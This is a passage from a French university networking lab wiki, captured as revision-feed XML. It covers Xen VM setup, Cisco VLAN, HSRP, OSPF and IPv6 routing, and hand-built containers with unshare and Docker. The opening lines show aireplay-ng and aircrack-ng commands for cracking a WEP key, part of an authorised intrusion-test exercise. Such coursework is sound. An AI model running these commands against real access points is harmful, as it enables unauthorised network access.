 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== 3.2 Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification =====&lt;br /&gt;
&lt;br /&gt;
Pour tester on peut tenter de ping le routeur depuis une source exterieure ou alors utiliser un routeur pour ping l'autre.&lt;br /&gt;
&lt;br /&gt;
* Ping depuis une machine virtuelle vers '''193.48.57.188''' (routeur 1) &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping dionysos r1.png]]&lt;br /&gt;
&lt;br /&gt;
* Ping depuis le routeur 1 vers '''193.48.57.189''' (routeur 2)&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping r1 r2.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.4 Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous retournons dans la configuration des interfaces pour ajouter un routage via IPv6.&lt;br /&gt;
&lt;br /&gt;
Dans le sujet il est indiqué que les adresses disponibles se situent à partir de &amp;lt;code&amp;gt;2001:660:4401:60b0::/64&amp;lt;/code&amp;gt; mais les premières adresses étant prises par les IMA2A5 nous utiliserons les adresses en '''C0''' et plus plutôt qu'à partir de '''B0'''&lt;br /&gt;
&lt;br /&gt;
* ajouter à la configuration globale &lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On supprime à nouveau l'interface (mais ce n'est pas nécessaire) pour y imposer la nouvelle configuration de l'interface&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 (avec IPv6) =====&lt;br /&gt;
&lt;br /&gt;
Remplacer &lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN &lt;br /&gt;
* &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
* &amp;lt;code&amp;gt;HH&amp;lt;/code&amp;gt; dans la partie IPv6 par '''C1''' à '''CB''' suivant le groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60HH::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60HH::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== 3.5 Interconnexion avec Internet IPv4 ====&lt;br /&gt;
&lt;br /&gt;
Comme les IMA2A5 utilisent déjà le VLAN130 ('''192.168.222.0/29''') nous utilisons le VLAN131 &amp;lt;code&amp;gt;192.168.222.8/29&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.9/29&amp;lt;/code&amp;gt; : Routeur 1&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.10/29&amp;lt;/code&amp;gt; : Routeur 2&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 (IPv4 Uniquement) =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248                      &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration OSPF =====&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==== 3.6 Interconnexion avec Internet IPv6 ====&lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  ipv6 router rip tpima5sc&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
===== Configuration du VLAN 131 (IPv4 et IPv6) =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  no int vlan 131&lt;br /&gt;
  int vlan 131&lt;br /&gt;
   ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification avec Google.com =====&lt;br /&gt;
&lt;br /&gt;
On récupère une IPv6 de google avec la commande &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; depuis une zabeth puis on tente depuis le routeur de ping cette adresse&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping v6 google.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.7 Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49108</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49108"/>
				<updated>2018-12-21T15:38:16Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* 3.4 Le routage de site (IPv6) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
